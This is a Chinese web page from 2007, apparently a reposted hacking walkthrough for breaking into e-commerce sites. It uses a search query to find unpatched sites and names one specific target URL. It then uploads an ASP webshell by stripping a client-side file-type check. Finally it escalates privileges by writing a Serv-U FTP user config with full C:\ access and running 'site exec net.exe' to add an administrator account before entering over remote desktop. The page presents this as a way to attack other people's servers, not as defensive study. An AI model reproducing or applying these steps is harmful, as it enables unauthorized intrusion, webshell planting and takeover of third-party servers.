我的一亩三分地 我就喜欢!
13fen  设为主页
 收藏本站
 
当前位置: > 一亩三分地:首页 > 网络学院 > 网络编程 > ASP专区 > Asp未分类 > 商务网站入侵和利用
热门文章排行
热门文章排行 手推车”功能的实现(10-07)
八大法则防范ASP网站漏洞(10-23)
ASP教程十一、调试ASP脚本(10-23)
在JSP中访问数据库大全(10-23)
虚机服务中常见Asp.Net低级错误一览(03-21)
精采文章排行
精采文章排行 ASP.NET实现抓取网页中的链接(11-15)
ASP连接数据库的11种方法(11-10)
如何动态创建网页的RSS内容摘要(11-10)
ASP网站漏洞及入侵防范方法(11-10)
ASP自定义函数:对字符串正则替换(11-10)
技术专题推荐
网管论坛交流
 

商务网站入侵和利用 

作者:佚名   来源:一亩三分地   点击:   日期:2007-03-30
 其它很多商务网站都是用这个修改的,原来都是一样,简单入侵……
上传漏洞太流行了,今天无聊网上找了一下上传利用的教程,怎么找来找去没有发现有天天商务的本地提交,cimg_save.asp也没有限制文件格式的上传利用,好几个月前我就发现了,可是网上一查怎么还是一堆没有打补丁的……

去找一下……

http://www.google.com/search?hl=zh-CN&ie=UTF-8&q=cimg_add.asp&btnG=Google%E6%90%9C%E7%B4%A2&lr=

就第一个吧http://qiye.sz.js.cn/manage/qyml/


上传


打开上传的网页(这个网页本来加了一个脚本限制上传文件格式,所以只要去掉然后把你要上传的地址真上去就可以了,比动网上传利用还要快…………^_^)

文件已经成功上传,是否继续添加……
F:\ASP木马\20041014144547.asp (29K) 上传 成功!

这个上传程序写入的目录是在PIC/后面

OK
提升权限

找到了他的Serv-U FTP SERVER那就好办了,看看有没有写入修改的权限,太可怜了,有写入的权限

加一个系统权限的用户

这个可能大家都已经非常利害了,我就不多说了……

User0=webasp|1|0

SKEYValues=
[USER=webasp|1]
Password=no7C154C45EDA5D0AABBC7DD93B0AEB078
HomeDir=c:\\

TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=

ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user 用户名 密码 /add //利用系统的net.exe文件加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators 用户名 /add //提升为超级用户


看看有没有终端……哈哈,漏洞太多了……惨,直接就用3389进系统吧……






文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:
·给你的FileSystemObject对象加把锁 ·在 Web 页上使用条件数值格式
·连接数据库查询手册(不仅仅适用于asp) ·警惕"给你的FileSystemObject对象加把锁"
·用ASP做全文检索 ·如何把ASP编写成DLL

   文章评论:(条)
  
 请留名: 匿名评论   点击查看所有评论 网管论坛
 

  责任编辑:一分  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。